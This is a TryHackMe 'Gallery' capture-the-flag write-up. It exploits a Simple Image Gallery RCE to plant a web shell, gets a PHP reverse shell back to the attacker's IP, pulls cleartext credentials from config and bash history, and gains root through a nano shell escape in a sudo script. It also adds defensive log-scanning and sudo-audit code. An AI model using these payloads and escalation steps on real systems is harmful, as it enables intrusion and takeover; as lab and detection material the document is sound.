Taking Note, TryHackMe Gallery
Simple Gallery System RCE and Privilege Escalation: Detailed Analysis
This writeup covers, step by step, the compromise of a host running the Simple Gallery System CMS. During initial reconnaissance the CMS is identified; a remote code execution (RCE) vulnerability is then used to obtain a web shell and a reverse shell. From there, database credentials and a user account are recovered from the filesystem, and a sudo misconfiguration is abused to obtain root.
Information Gathering
Port Scan
The Nmap scan shows three open ports: 22 (SSH), 80 (HTTP, the Apache2 default page) and 8080 (HTTP, Simple Image Gallery System).
# Nmap 7.95 scan initiated Thu Dec 4 13:52:50 2025 as: nmap -sC -sV -oA nmap.txt 10.48.160.0
Nmap scan report for 10.48.160.0
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d6:ad:9d:3b:94:c2:d2:17:44:4b:4d:77:37:2b:f1:36 (RSA)
| 256 be:fa:3a:85:ea:1e:35:c1:b3:c5:bc:b1:90:5f:6f:b9 (ECDSA)
|_ 256 d1:a0:05:80:d0:f2:59:a3:50:69:17:61:bf:4c:3b:0e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Simple Image Gallery System
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 4 13:53:36 2025 -- 1 IP address (1 host up) scanned in 45.32 seconds
Directory Enumeration
Running Gobuster against the web server revealed a /gallery path. Browsing to /gallery showed the “Simple Gallery System” application.
gobuster dir -w ~/SecLists//Discovery/Web-Content/raft-large-directories.txt -u 10.49.136.138
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.49.136.138
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /Users/jako/private/cyber-skill-utils/SecLists//Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/gallery (Status: 301) [Size: 316] [--> http://10.49.136.138/gallery/]
CMS Vulnerability Search
Searching searchsploit for “simple gallery” turned up an unauthenticated Remote Code Execution (RCE) exploit for Simple Image Gallery 1.0 (50214.py).
╰─$ searchsploit -t simple gallery
---------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- ---------------------------------
ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure | php/webapps/7819.txt
Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload | php/webapps/6803.txt
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities | php/webapps/49064.txt
Joomla! Component com_simplephotogallery 1.0 - Arbitrary File Upload | php/webapps/36373.txt
Joomla! Component com_simplephotogallery 1.0 - SQL Injection | php/webapps/36385.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site S | php/webapps/44104.txt
MunkyScripts Simple Gallery - SQL Injection | php/webapps/12045.html
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt
Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting | php/webapps/29643.txt
Simple one-file Gallery - 'gallery.php?f' Traversal Arbitrary File Access | php/webapps/29642.txt
Simple PHP Gallery 1.1 - 'System SP_Index.php' Cross-Site Scripting | php/webapps/29175.txt
Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting | php/webapps/31319.txt
SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting | php/webapps/30811.txt
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection | php/webapps/37113.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Remote Code Execution (RCE)
Running the exploit found above (50214.py) uploaded a web shell. The shell URL it printed confirmed that commands could be executed on the server.
$ python3 /opt/homebrew/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
TARGET = 10.49.136.138/gallery
Login Bypass
shell name TagoaxivntyundngftfLetta
protecting user
User ID : 1
Firsname : Adminstrator
Lasname : Admin
Username : admin
shell uploading
- OK -
Shell URL : http://10.49.136.138/gallery/uploads/1764909000_TagoaxivntyundngftfLetta.php?cmd=whoami
Gaining a Shell
Using the uploaded web shell, a PHP reverse-shell payload was executed to connect back to the attacker machine; the payload was passed URL-encoded in the cmd parameter. The resulting non-interactive shell was then upgraded to an interactive one with Python3's pty module.
Local (attacker) side, Netcat listener:
╰─$ nc -l 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Remote (victim) side, PHP reverse-shell payload (plain and URL-encoded):
php -r '$sock=fsockopen("192.168.137.48",1234);exec("sh <&3 >&3 2>&3");'
php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.137.48%22%2C1234%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Upgrading to an interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-49-136-138:/var/www/html/gallery/uploads$
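The two artefacts above (a .php file served out of /gallery/uploads/ and the URL-encoded payload in its cmd parameter) give a defender a concrete signature to look for in the web server logs. The following is an added example, not part of the original writeup or of the CMS: the log lines are constructed in Apache combined format, and the upload path and cmd parameter names are assumed from the shell URL shown above.

```python
import re
from urllib.parse import parse_qs

# Constructed Apache combined-format log lines for illustration (not the target's real log).
# The upload filename and the URL-encoded payload follow the pattern shown in the writeup.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2025:13:55:01 +0000] "GET /gallery/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2025:13:55:09 +0000] "GET /gallery/uploads/1764909000_TagoaxivntyundngftfLetta.php?cmd=whoami HTTP/1.1" 200 9 "-" "python-requests/2.31"
203.0.113.5 - - [04/Dec/2025:13:56:30 +0000] "GET /gallery/uploads/1764909000_TagoaxivntyundngftfLetta.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.137.48%22%2C1234%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 HTTP/1.1" 200 0 "-" "curl/8.4"
198.51.100.9 - - [04/Dec/2025:14:01:00 +0000] "GET /gallery/uploads/1764909001_my-cat.jpg HTTP/1.1" 200 159262 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_DIR = "/gallery/uploads/"   # assumed: this directory should only ever serve image files
SCRIPT_EXT = re.compile(r'\.(php|phtml|phar|php[3-7])$', re.IGNORECASE)

def classify_request(target):
    """Return a finding if the request executes a server-side script under the uploads dir, else None."""
    path, _, query = target.partition("?")
    if not path.startswith(UPLOAD_DIR) or not SCRIPT_EXT.search(path):
        return None
    params = parse_qs(query)           # percent-decodes the values, so the payload becomes readable
    cmd = params.get("cmd", [""])[0]
    return {"file": path, "cmd": cmd}

def find_webshell_activity(log_text):
    """Scan access-log text and return one finding per request that hits an uploaded script."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            hits.append(finding)
    return hits

if __name__ == "__main__":
    for h in find_webshell_activity(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["file"]} cmd={h["cmd"]!r}')
```

A matching preventive control is to deny script execution in the uploads directory at the web server (for example, no PHP handler for that path) so that an uploaded .php file is served as inert bytes rather than executed.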
Lateral Movement & Privilege Escalation
Recovering the CMS database credentials
The initialize.php file in the CMS directory contains the database connection details in clear text (username gallery_user, password passw0rd321, database gallery_db).
<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>
Internal Enumeration
While enumerating the host (here with linpeas), a backup directory mike_home_backup was found under /var/backups.
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 www-data www-data 971926 Nov 1 04:39 /tmp/linpeas.sh
-rwxr-xr-x 1 root root 3772 May 24 2021 /var/backups/mike_home_backup/.bashrc
-rwxr-xr-x 1 root root 135 May 24 2021 /var/backups/mike_home_backup/.bash_history
-rwxr-xr-x 1 root root 220 May 24 2021 /var/backups/mike_home_backup/.bash_logout
-rwxr-xr-x 1 root root 20549 May 24 2021 /var/backups/mike_home_backup/images/23-04.jpg
-rwxr-xr-x 1 root root 159262 May 24 2021 /var/backups/mike_home_backup/images/my-cat.jpg
-rwxr-xr-x 1 root root 436526 May 24 2021 /var/backups/mike_home_backup/images/26-04.jpg
-rwxr-xr-x 1 root root 103 May 24 2021 /var/backups/mike_home_backup/documents/accounts.txt
-rwxr-xr-x 1 root root 807 May 24 2021 /var/backups/mike_home_backup/.profile
Recovering a user account
The file mike_home_backup/.bash_history contains the password of the mike user (b3stpassw0rdbr0xx); it appears as an argument on a sudo -l command line.
www-data@ip-10-48-160-0:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -l b3stpassw0rdbr0xx
clear
sudo -l
exit
Privilege Escalation
After logging in over SSH as mike, sudo -l showed that mike may run the script /opt/rootkit.sh as root without a password.
mike@ip-10-49-136-138:~$ sudo -l
Matching Defaults entries for mike on ip-10-49-136-138:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on ip-10-49-136-138:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
The /opt/rootkit.sh script includes a “read” option that opens /root/report.txt in nano, as root.
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
  versioncheck)
    /usr/bin/rkhunter --versioncheck ;;
  update)
    /usr/bin/rkhunter --update;;
  list)
    /usr/bin/rkhunter --list;;
  read)
    /bin/nano /root/report.txt;;
  *)
    exit;;
esac
From inside nano, the ^R^X key sequence (Read File, then Execute Command) was used to run reset; sh 1>&0 2>&0, which yields a root shell.
nano
^R^X
reset; sh 1>&0 2>&0
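The root cause on this side is a NOPASSWD wrapper that hands an interactive editor to the caller. The following added example (not part of the writeup) parses the rootkit.sh shown above and flags case branches that launch a program with a well-known shell escape; the set of such programs and the suggested fix are assumptions for illustration.

```python
import re

# /opt/rootkit.sh as shown in the writeup, embedded so the audit runs offline.
ROOTKIT_SH = """#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
  versioncheck)
    /usr/bin/rkhunter --versioncheck ;;
  update)
    /usr/bin/rkhunter --update;;
  list)
    /usr/bin/rkhunter --list;;
  read)
    /bin/nano /root/report.txt;;
  *)
    exit;;
esac
"""

# Assumed list: interactive editors/pagers that can spawn a child shell of the invoking user.
SHELL_ESCAPE_PROGRAMS = {"nano", "vi", "vim", "less", "more", "man", "ed", "emacs"}
BRANCH_RE = re.compile(r'^\s*([\w*|-]+)\)\s*(.*)$')   # "label)" optionally followed by a command

def parse_case_branches(script):
    """Map each case label to the command text before its ';;' (one command per branch)."""
    branches, label, buf = {}, None, []
    for line in script.splitlines():
        m = BRANCH_RE.match(line)
        if label is None:
            if not m:
                continue
            label, buf = m.group(1), ([m.group(2)] if m.group(2) else [])
        else:
            buf.append(line)
        if ";;" in " ".join(buf):
            branches[label] = " ".join(buf).split(";;")[0].strip()
            label, buf = None, []
    return branches

def audit_sudo_wrapper(script):
    """Flag branches that would run a shell-escapable program with the wrapper's (root) privileges."""
    findings = []
    for label, body in parse_case_branches(script).items():
        argv = body.split()
        if not argv or argv[0] == "exit":
            continue
        prog = argv[0].rsplit("/", 1)[-1]          # basename, e.g. /bin/nano -> nano
        if prog in SHELL_ESCAPE_PROGRAMS:
            findings.append({"choice": label, "command": body,
                             "issue": f"{prog} offers a shell escape and would run as root",
                             "fix": "replace with a non-interactive reader such as /bin/cat, or drop the option"})
    return findings
```

Running the audit on the embedded script reports a single finding, the read branch, which is exactly the path used for escalation above.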